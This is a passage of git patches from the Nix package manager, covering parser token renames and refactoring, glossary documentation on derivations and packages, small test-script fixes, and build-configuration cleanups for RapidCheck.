@@ or { return OR_KW; } .msg = hintfmt("invalid float '%1%'", yytext), .errPos = data->state.positions[CUR_POS], }); - return FLOAT; + return FLOAT_LIT; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index b331776f0..60bcfebf9 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -365,11 +365,11 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err %type attr %token ID %token STR IND_STR -%token INT -%token FLOAT +%token INT_LIT +%token FLOAT_LIT %token PATH HPATH SPATH PATH_END %token URI -%token IF THEN ELSE ASSERT WITH LET IN REC INHERIT EQ NEQ AND OR IMPL OR_KW +%token IF THEN ELSE ASSERT WITH LET IN_KW REC INHERIT EQ NEQ AND OR IMPL OR_KW %token DOLLAR_CURLY /* == ${ */ %token IND_STRING_OPEN IND_STRING_CLOSE %token ELLIPSIS @@ -412,7 +412,7 @@ expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } | WITH expr ';' expr_function { $$ = new ExprWith(CUR_POS, $2, $4); } - | LET binds IN expr_function + | LET binds IN_KW expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), @@ -482,8 +482,8 @@ expr_simple else $$ = new ExprVar(CUR_POS, data->symbols.create($1)); } - | INT { $$ = new ExprInt($1); } - | FLOAT { $$ = new ExprFloat($1); } + | INT_LIT { $$ = new ExprInt($1); } + | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { $$ = stripIndentation(CUR_POS, data->symbols, std::move(*$2)); From cbd5553d57ebf5d0532047165a2d81825424bd76 Mon Sep 17 00:00:00 2001 From: Qyriad Date: Sat, 13 Jan 2024 04:20:08 -0700 Subject: [PATCH 253/654] doc: provide context in glossary definitions (#9378) --- doc/manual/src/glossary.md | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 07891175a..1fdb8b4dd 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -3,10 +3,10 @@ - [derivation]{#gloss-derivation} A description of a build task. The result of a derivation is a - store object. Derivations are typically specified in Nix expressions + store object. Derivations declared in Nix expressions are specified using the [`derivation` primitive](./language/derivations.md). These are translated into low-level *store derivations* (implicitly by - `nix-env` and `nix-build`, or explicitly by `nix-instantiate`). + `nix-build`, or explicitly by `nix-instantiate`). [derivation]: #gloss-derivation @@ -14,6 +14,7 @@ A [derivation] represented as a `.drv` file in the [store]. It has a [store path], like any [store object]. + It is the [instantiated][instantiate] form of a derivation. Example: `/nix/store/g946hcz4c8mdvq2g8vxx42z51qb71rvp-git-2.38.1.drv` @@ -23,9 +24,9 @@ - [instantiate]{#gloss-instantiate}, instantiation - Translate a [derivation] into a [store derivation]. + Save an evaluated [derivation] as a [store derivation] in the Nix [store]. - See [`nix-instantiate`](./command-ref/nix-instantiate.md). + See [`nix-instantiate`](./command-ref/nix-instantiate.md), which produces a store derivation from a Nix expression that evaluates to a derivation. [instantiate]: #gloss-instantiate @@ -66,7 +67,7 @@ From the perspective of the location where Nix is invoked, the Nix store can be referred to _local_ or _remote_. Only a [local store]{#gloss-local-store} exposes a location in the file system of the machine where Nix is invoked that allows access to store objects, typically `/nix/store`. - Local stores can be used for building [derivations](#derivation). + Local stores can be used for building [derivations](#gloss-derivation). See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details. [store]: #gloss-store @@ -168,9 +169,10 @@ A high-level description of software packages and compositions thereof. Deploying software using Nix entails writing Nix - expressions for your packages. Nix expressions are translated to - derivations that are stored in the Nix store. These derivations can - then be built. + expressions for your packages. Nix expressions specify [derivations][derivation], + which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. + These derivations can then be [realised][realise] to produce + [outputs][output]. - [reference]{#gloss-reference} @@ -222,6 +224,9 @@ The [store derivation] that produced an [output path]. + The deriver for an output path can be queried with the `--deriver` option to + [`nix-store --query`](@docroot@/command-ref/nix-store/query.md). + - [validity]{#gloss-validity} A store path is valid if all [store object]s in its [closure] can be read from the [store]. From e838ac98d4fc54774bcaaa30a72cd9d3da01befc Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 13 Jan 2024 19:41:27 +0100 Subject: [PATCH 254/654] doc/glossary: Nix expression can be language expression --- doc/manual/src/glossary.md | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 1fdb8b4dd..870b2c3c6 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -167,12 +167,13 @@ - [Nix expression]{#gloss-nix-expression} - A high-level description of software packages and compositions - thereof. Deploying software using Nix entails writing Nix - expressions for your packages. Nix expressions specify [derivations][derivation], - which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. - These derivations can then be [realised][realise] to produce - [outputs][output]. + 1. Commonly, a high-level description of software packages and compositions + thereof. Deploying software using Nix entails writing Nix + expressions for your packages. Nix expressions specify [derivations][derivation], + which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. + These derivations can then be [realised][realise] to produce [outputs][output]. + + 2. A syntactically valid use of the [Nix language]. For example, the contents of a `.nix` file form an expression. - [reference]{#gloss-reference} @@ -287,3 +288,6 @@ These flags are enabled or disabled with the [`experimental-features`](./command-ref/conf-file.html#conf-experimental-features) setting. See the contribution guide on the [purpose and lifecycle of experimental feaures](@docroot@/contributing/experimental-features.md). + + +[Nix language]: ./language/index.md \ No newline at end of file From 7e5fa5c25ce585da5399038bc92980fddbb65d8b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 13 Jan 2024 20:00:06 +0100 Subject: [PATCH 255/654] doc/glossary: Define package and package attribute set A small step towards https://github.com/NixOS/nix/issues/6507 I believe this incomplete definition is one that can be agreed on. It would be nice to define more, but considering that the issue also proposes changes to the design, I believe we should hold off on those. As for the wording, we're dealing with some very general and vague terms, that have to be treated with exactly the right amount of vagueness to be effective. I start out with a fairly abstract definition of package. 1. to establish a baseline so we know what we're talking about 2. so that we can go in and clarify that we have an extra, Nix-specific definition. "Software" is notoriously ill-defined, so it makes a great qualifier for package, which we don't really want to pin down either, because that would just get us lost in discussion. We can come back to this after we've done 6057 and a few years in a desert cave. Then comes the "package attribute set" definition. I can already hear Valentin say "That's not even Nix's responsibility!" and on some days I might even agree. However, in our current reality, we have `nix-env`, `nix-build` and `nix profile`, which query the `outputName` attribute - among others - which just don't exist in the derivation. For those who can't believe what they're reading: $ nix-build --expr 'with import ./. {}; bind // {outputName = "lib";}' --no-out-link this path will be fetched (1.16 MiB download, 3.72 MiB unpacked): /nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib copying path '/nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib' from 'https://cache.nixos.org'... /nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib and let me tell you that bind is not a library. So anyway, that's also proof of why calling this a "derivation attrset" would be wrong, despite the type attribute. --- doc/manual/src/glossary.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 1fdb8b4dd..5e3c0e024 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -271,6 +271,21 @@ The epsilon symbol. In the context of a package, this means the version is empty. More precisely, the derivation does not have a version attribute. +- [package]{#package} + + 1. A software package; typically a collection of programs, files and data. + + 2. A [package attribute set]. + +- [package attribute set]{#package-attribute-set} + + An [attribute set] containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as + - attributes that refer to the files of a [package], typically in the form of [derivation outputs](#output), + - attributes that declare something about how the package is supposed to be installed or used, + - other metadata or arbitrary attributes. + + [package attribute set]: #package-attribute-set + - [string interpolation]{#gloss-string-interpolation} Expanding expressions enclosed in `${ }` within a [string], [path], or [attribute name]. From bbcd9fcfc1216bd7d88fef7933766e616c7111d0 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Sat, 13 Jan 2024 11:27:04 -0800 Subject: [PATCH 256/654] Arbitrarily bring back some nix-daemon calls This means that both `nix daemon` and `nix-daemon` will be (somewhat) tested. --- tests/functional/build-remote-trustless-should-pass-1.sh | 2 +- tests/functional/nix-daemon-untrusting.sh | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/functional/build-remote-trustless-should-pass-1.sh b/tests/functional/build-remote-trustless-should-pass-1.sh index 736e280e4..516bdf092 100644 --- a/tests/functional/build-remote-trustless-should-pass-1.sh +++ b/tests/functional/build-remote-trustless-should-pass-1.sh @@ -2,7 +2,7 @@ source common.sh # Remote trusts us file=build-hook.nix -prog='nix%20daemon' +prog=nix-daemon proto=ssh-ng source build-remote-trustless.sh diff --git a/tests/functional/nix-daemon-untrusting.sh b/tests/functional/nix-daemon-untrusting.sh index c339b5833..bcdb70989 100755 --- a/tests/functional/nix-daemon-untrusting.sh +++ b/tests/functional/nix-daemon-untrusting.sh @@ -1,3 +1,3 @@ #!/bin/sh -exec nix daemon --force-untrusted "$@" +exec nix-daemon --force-untrusted "$@" From f61d951909a619b7a430d8d8aa739e310c7bf472 Mon Sep 17 00:00:00 2001 From: Las Safin Date: Sat, 13 Jan 2024 19:27:20 +0000 Subject: [PATCH 257/654] Avoid unnecessary copy of goal log The data was (accidentally?) copied into a std::string, even though the string is immediately converted into a std::string_view. The code has been changed to construct a std::string_view directly, such that one copy less happens. --- src/libstore/build/worker.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 399ad47fd..974a9f510 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -449,7 +449,7 @@ void Worker::waitForInput() } else { printMsg(lvlVomit, "%1%: read %2% bytes", goal->getName(), rd); - std::string data((char *) buffer.data(), rd); + std::string_view data((char *) buffer.data(), rd); j->lastOutput = after; goal->handleChildOutput(k, data); } From 03a6ca9b253c35b33e041dce595239968224e0d3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 14 Jan 2024 15:25:24 -0500 Subject: [PATCH 258/654] `tests/functional/nix-profile.sh`: Add missing `--no-link` Otherwise we get a stray `tests/functional/result`, which can cause spurious failures later. (I got a failure because the test temp dir effecting the store dir changed. This caused a test later because Nix didn't want to remove the old `result` because it wasn't pointing inside the new Nix store.) --- tests/functional/nix-profile.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 6f304bd9a..35a62fbe2 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -199,6 +199,6 @@ clearProfiles mkdir -p $TEST_ROOT/import-profile outPath=$(nix build --no-link --print-out-paths $flake1Dir/flake.nix^out) printf '{ "version": 2, "elements": [ { "active": true, "attrPath": "legacyPackages.x86_64-linux.hello", "originalUrl": "flake:nixpkgs", "outputs": null, "priority": 5, "storePaths": [ "%s" ], "url": "github:NixOS/nixpkgs/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" } ] }' "$outPath" > $TEST_ROOT/import-profile/manifest.json -nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) +nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) --no-link nix profile list | grep -A4 'Name:.*hello' | grep "Store paths:.*$outPath" nix profile remove hello 2>&1 | grep 'removed 1 packages, kept 0 packages' From dd42a4e3e9ec6d76d393e24f449f161b62579dc5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 15 Jan 2024 08:04:46 -0500 Subject: [PATCH 259/654] flake.lock: Update MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/86501af7f1d51915e6c335f90f2cab73d7704ef3' (2024-01-11) → 'github:NixOS/nixpkgs/a1982c92d8980a0114372973cbdfe0a307f1bdea' (2024-01-12) --- flake.lock | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/flake.lock b/flake.lock index 65e468e8b..f0efb4036 100644 --- a/flake.lock +++ b/flake.lock @@ -34,11 +34,11 @@ }, "nixpkgs": { "locked": { - "lastModified": 1704982786, - "narHash": "sha256-w62+4HyaHafLWjvrC2Eto7bSnSJQtia8oqs3//mkpCU=", + "lastModified": 1705033721, + "narHash": "sha256-K5eJHmL1/kev6WuqyqqbS1cdNnSidIZ3jeqJ7GbrYnQ=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "86501af7f1d51915e6c335f90f2cab73d7704ef3", + "rev": "a1982c92d8980a0114372973cbdfe0a307f1bdea", "type": "github" }, "original": { From 9b9ecdee3424056cb854bc8f1aa49fe330c08c83 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 23:50:03 -0500 Subject: [PATCH 260/654] Simplify RapidCheck configure No more `RAPIDCHECK_HEADERS`! --- Makefile.config.in | 1 - configure.ac | 21 +-------------------- doc/internal-api/doxygen.cfg.in | 2 +- package.nix | 2 +- 4 files changed, 3 insertions(+), 23 deletions(-) diff --git a/Makefile.config.in b/Makefile.config.in index 21a9f41ec..d5c382630 100644 --- a/Makefile.config.in +++ b/Makefile.config.in @@ -29,7 +29,6 @@ LOWDOWN_LIBS = @LOWDOWN_LIBS@ OPENSSL_LIBS = @OPENSSL_LIBS@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_VERSION = @PACKAGE_VERSION@ -RAPIDCHECK_HEADERS = @RAPIDCHECK_HEADERS@ SHELL = @bash@ SODIUM_LIBS = @SODIUM_LIBS@ SQLITE3_LIBS = @SQLITE3_LIBS@ diff --git a/configure.ac b/configure.ac index 2594544ab..f46cff732 100644 --- a/configure.ac +++ b/configure.ac @@ -353,27 +353,8 @@ AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. PKG_CHECK_MODULES([GTEST], [gtest_main]) - # Look for rapidcheck. -AC_ARG_VAR([RAPIDCHECK_HEADERS], [include path of gtest headers shipped by RAPIDCHECK]) -# No pkg-config yet, https://github.com/emil-e/rapidcheck/issues/302 -AC_LANG_PUSH(C++) -AC_SUBST(RAPIDCHECK_HEADERS) -[CXXFLAGS="-I $RAPIDCHECK_HEADERS $CXXFLAGS"] -[LIBS="-lrapidcheck -lgtest $LIBS"] -AC_CHECK_HEADERS([rapidcheck/gtest.h], [], [], [#include ]) -dnl AC_CHECK_LIB doesn't work for C++ libs with mangled symbols -AC_LINK_IFELSE([ - AC_LANG_PROGRAM([[ - #include - #include - ]], [[ - return RUN_ALL_TESTS(); - ]]) - ], - [], - [AC_MSG_ERROR([librapidcheck is not found.])]) -AC_LANG_POP(C++) +PKG_CHECK_MODULES([RAPIDCHECK], [rapidcheck rapidcheck_gtest]) ]) diff --git a/doc/internal-api/doxygen.cfg.in b/doc/internal-api/doxygen.cfg.in index ad5af97e6..6c6c325bd 100644 --- a/doc/internal-api/doxygen.cfg.in +++ b/doc/internal-api/doxygen.cfg.in @@ -81,7 +81,7 @@ EXPAND_ONLY_PREDEF = YES # RECURSIVE has no effect here. # This tag requires that the tag SEARCH_INCLUDES is set to YES. -INCLUDE_PATH = @RAPIDCHECK_HEADERS@ +INCLUDE_PATH = # If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then this # tag can be used to specify a list of macro names that should be expanded. The diff --git a/package.nix b/package.nix index a632fd6ec..a1188ba9c 100644 --- a/package.nix +++ b/package.nix @@ -309,7 +309,7 @@ in { ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" ++ lib.optional (doBuild && stdenv.hostPlatform.isStatic) "--enable-embedded-sandbox-shell" - ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; + ; enableParallelBuilding = true; From beed00c04e136e8d685905e4b2b1116ecdf42f63 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 13 Jan 2024 13:08:38 -0500 Subject: [PATCH 261/654] `absPath`: just take a `std::string_view` 1. Slightly more efficient 2. Easier to call Co-authored-by: Cole Helbling --- src/libutil/canon-path.cc | 6 +++--- src/libutil/file-system.cc | 14 +++++++++++--- src/libutil/file-system.hh | 2 +- 3 files changed, 15 insertions(+), 7 deletions(-) diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index 1e465f1f6..0a0f96a05 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -6,11 +6,11 @@ namespace nix { CanonPath CanonPath::root = CanonPath("/"); CanonPath::CanonPath(std::string_view raw) - : path(absPath((Path) raw, "/")) + : path(absPath(raw, "/")) { } CanonPath::CanonPath(std::string_view raw, const CanonPath & root) - : path(absPath((Path) raw, root.abs())) + : path(absPath(raw, root.abs())) { } CanonPath::CanonPath(const std::vector & elems) @@ -22,7 +22,7 @@ CanonPath::CanonPath(const std::vector & elems) CanonPath CanonPath::fromCwd(std::string_view path) { - return CanonPath(unchecked_t(), absPath((Path) path)); + return CanonPath(unchecked_t(), absPath(path)); } std::optional CanonPath::parent() const diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index 4cac35ace..ab8d32275 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -21,9 +21,16 @@ namespace fs = std::filesystem; namespace nix { -Path absPath(Path path, std::optional dir, bool resolveSymlinks) +Path absPath(PathView path, std::optional dir, bool resolveSymlinks) { + std::string scratch; + if (path[0] != '/') { + // In this case we need to call `canonPath` on a newly-created + // string. We set `scratch` to that string first, and then set + // `path` to `scratch`. This ensures the newly-created string + // lives long enough for the call to `canonPath`, and allows us + // to just accept a `std::string_view`. if (!dir) { #ifdef __GNU__ /* GNU (aka. GNU/Hurd) doesn't have any limitation on path @@ -35,12 +42,13 @@ Path absPath(Path path, std::optional dir, bool resolveSymlinks) if (!getcwd(buf, sizeof(buf))) #endif throw SysError("cannot get cwd"); - path = concatStrings(buf, "/", path); + scratch = concatStrings(buf, "/", path); #ifdef __GNU__ free(buf); #endif } else - path = concatStrings(*dir, "/", path); + scratch = concatStrings(*dir, "/", path); + path = scratch; } return canonPath(path, resolveSymlinks); } diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh index 4637507b3..464efc242 100644 --- a/src/libutil/file-system.hh +++ b/src/libutil/file-system.hh @@ -41,7 +41,7 @@ struct Source; * specified directory, or the current directory otherwise. The path * is also canonicalised. */ -Path absPath(Path path, +Path absPath(PathView path, std::optional dir = {}, bool resolveSymlinks = false); From f07388bf985c2440413f398cf93d5f5840d1ec8c Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 262/654] remove ParserFormals this is a proper subset of Formals anyway, so let's just use those and avoid the extra allocations and moves. --- src/libexpr/parser.y | 30 ++++++++++-------------------- 1 file changed, 10 insertions(+), 20 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 60bcfebf9..b7b25854b 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -63,11 +63,6 @@ namespace nix { std::optional error; }; - struct ParserFormals { - std::vector formals; - bool ellipsis = false; - }; - } // using C a struct allows us to avoid having to define the special @@ -179,7 +174,7 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, } -static Formals * toFormals(ParseData & data, ParserFormals * formals, +static Formals * validateFormals(ParseData & data, Formals * formals, PosIdx pos = noPos, Symbol arg = {}) { std::sort(formals->formals.begin(), formals->formals.end(), @@ -200,18 +195,13 @@ static Formals * toFormals(ParseData & data, ParserFormals * formals, .errPos = data.state.positions[duplicate->second] }); - Formals result; - result.ellipsis = formals->ellipsis; - result.formals = std::move(formals->formals); - - if (arg && result.has(arg)) + if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[arg]), .errPos = data.state.positions[pos] }); - delete formals; - return new Formals(std::move(result)); + return formals; } @@ -339,7 +329,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err nix::Expr * e; nix::ExprList * list; nix::ExprAttrs * attrs; - nix::ParserFormals * formals; + nix::Formals * formals; nix::Formal * formal; nix::NixInt n; nix::NixFloat nf; @@ -397,16 +387,16 @@ expr_function : ID ':' expr_function { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { $$ = new ExprLambda(CUR_POS, toFormals(*data, $2), $5); } + { $$ = new ExprLambda(CUR_POS, validateFormals(*data, $2), $5); } | '{' formals '}' '@' ID ':' expr_function { auto arg = data->symbols.create($5); - $$ = new ExprLambda(CUR_POS, arg, toFormals(*data, $2, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, toFormals(*data, $4, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -650,11 +640,11 @@ formals : formal ',' formals { $$ = $3; $$->formals.emplace_back(*$1); delete $1; } | formal - { $$ = new ParserFormals; $$->formals.emplace_back(*$1); $$->ellipsis = false; delete $1; } + { $$ = new Formals; $$->formals.emplace_back(*$1); $$->ellipsis = false; delete $1; } | - { $$ = new ParserFormals; $$->ellipsis = false; } + { $$ = new Formals; $$->ellipsis = false; } | ELLIPSIS - { $$ = new ParserFormals; $$->ellipsis = true; } + { $$ = new Formals; $$->ellipsis = true; } ; formal From e8d9de967fe47a7f9324b0022a2ef50df59f419d Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 263/654] simplify parse error reporting since nix doesn't use the bison `error` terminal anywhere any invocation of yyerror will immediately cause a failure. since we're *already* leaking tons of memory whatever little bit bison allocates internally doesn't much matter any more, and we'll be replacing the parser soon anyway. coincidentally this now also matches the error behavior of URIs when they are disabled or ~/ paths in pure eval mode, duplicate attr detection etc. --- src/libexpr/parser.y | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index b7b25854b..44fae6880 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -18,6 +18,7 @@ #include +#include "finally.hh" #include "util.hh" #include "users.hh" @@ -60,7 +61,6 @@ namespace nix { Expr * result; SourcePath basePath; PosTable::Origin origin; - std::optional error; }; } @@ -315,10 +315,10 @@ static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * error) { - data->error = { + throw ParseError({ .msg = hintfmt(error), .errPos = data->state.positions[makeCurPos(*loc, data)] - }; + }); } @@ -689,11 +689,10 @@ Expr * EvalState::parse( }; yylex_init(&scanner); - yy_scan_buffer(text, length, scanner); - int res = yyparse(scanner, &data); - yylex_destroy(scanner); + Finally _destroy([&] { yylex_destroy(scanner); }); - if (res) throw ParseError(data.error.value()); + yy_scan_buffer(text, length, scanner); + yyparse(scanner, &data); data.result->bindVars(*this, staticEnv); From 1b09b80afac27c67157d4b315c237fa7bb9b8d08 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 264/654] make parser utility functions members of ParseData all of them need access to parser state in some way. make them members to allow this without fussing so much. --- src/libexpr/parser.y | 126 ++++++++++++++++++++++--------------------- 1 file changed, 66 insertions(+), 60 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 44fae6880..beb660e36 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -27,6 +27,15 @@ #include "eval-settings.hh" #include "globals.hh" +// using C a struct allows us to avoid having to define the special +// members that using string_view here would implicitly delete. +struct StringToken { + const char * p; + size_t l; + bool hasIndentation; + operator std::string_view() const { return {p, l}; } +}; + namespace nix { #define YYLTYPE ::nix::ParserLocation @@ -61,19 +70,18 @@ namespace nix { Expr * result; SourcePath basePath; PosTable::Origin origin; + + void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); + void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); + void addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos); + Formals * validateFormals(Formals * formals, PosIdx pos = noPos, Symbol arg = {}); + Expr * stripIndentation(const PosIdx pos, + std::vector>> && es); + PosIdx makeCurPos(const ParserLocation & loc); }; } -// using C a struct allows us to avoid having to define the special -// members that using string_view here would implicitly delete. -struct StringToken { - const char * p; - size_t l; - bool hasIndentation; - operator std::string_view() const { return {p, l}; } -}; - #define YY_DECL int yylex \ (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParseData * data) @@ -94,7 +102,7 @@ using namespace nix; namespace nix { -static void dupAttr(const EvalState & state, const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) +void ParseData::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", @@ -103,7 +111,7 @@ static void dupAttr(const EvalState & state, const AttrPath & attrPath, const Po }); } -static void dupAttr(const EvalState & state, Symbol attr, const PosIdx pos, const PosIdx prevPos) +void ParseData::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), @@ -112,8 +120,7 @@ static void dupAttr(const EvalState & state, Symbol attr, const PosIdx pos, cons } -static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, - Expr * e, const PosIdx pos, const nix::EvalState & state) +void ParseData::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * e, const PosIdx pos) { AttrPath::iterator i; // All attrpaths have at least one attr @@ -126,10 +133,10 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, if (j != attrs->attrs.end()) { if (!j->second.inherited) { ExprAttrs * attrs2 = dynamic_cast(j->second.e); - if (!attrs2) dupAttr(state, attrPath, pos, j->second.pos); + if (!attrs2) dupAttr(attrPath, pos, j->second.pos); attrs = attrs2; } else - dupAttr(state, attrPath, pos, j->second.pos); + dupAttr(attrPath, pos, j->second.pos); } else { ExprAttrs * nested = new ExprAttrs; attrs->attrs[i->symbol] = ExprAttrs::AttrDef(nested, pos); @@ -156,12 +163,12 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, for (auto & ad : ae->attrs) { auto j2 = jAttrs->attrs.find(ad.first); if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error. - dupAttr(state, ad.first, j2->second.pos, ad.second.pos); + dupAttr(ad.first, j2->second.pos, ad.second.pos); jAttrs->attrs.emplace(ad.first, ad.second); } jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end()); } else { - dupAttr(state, attrPath, pos, j->second.pos); + dupAttr(attrPath, pos, j->second.pos); } } else { // This attr path is not defined. Let's create it. @@ -174,8 +181,7 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, } -static Formals * validateFormals(ParseData & data, Formals * formals, - PosIdx pos = noPos, Symbol arg = {}) +Formals * ParseData::validateFormals(Formals * formals, PosIdx pos, Symbol arg) { std::sort(formals->formals.begin(), formals->formals.end(), [] (const auto & a, const auto & b) { @@ -191,21 +197,21 @@ static Formals * validateFormals(ParseData & data, Formals * formals, } if (duplicate) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[duplicate->first]), - .errPos = data.state.positions[duplicate->second] + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .errPos = state.positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[arg]), - .errPos = data.state.positions[pos] + .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .errPos = state.positions[pos] }); return formals; } -static Expr * stripIndentation(const PosIdx pos, SymbolTable & symbols, +Expr * ParseData::stripIndentation(const PosIdx pos, std::vector>> && es) { if (es.empty()) return new ExprString(""); @@ -302,12 +308,12 @@ static Expr * stripIndentation(const PosIdx pos, SymbolTable & symbols, } -static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) +PosIdx ParseData::makeCurPos(const ParserLocation & loc) { - return data->state.positions.add(data->origin, loc.first_line, loc.first_column); + return state.positions.add(origin, loc.first_line, loc.first_column); } -#define CUR_POS makeCurPos(*yylocp, data) +#define CUR_POS data->makeCurPos(*yylocp) } @@ -317,7 +323,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err { throw ParseError({ .msg = hintfmt(error), - .errPos = data->state.positions[makeCurPos(*loc, data)] + .errPos = data->state.positions[data->makeCurPos(*loc)] }); } @@ -387,16 +393,16 @@ expr_function : ID ':' expr_function { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { 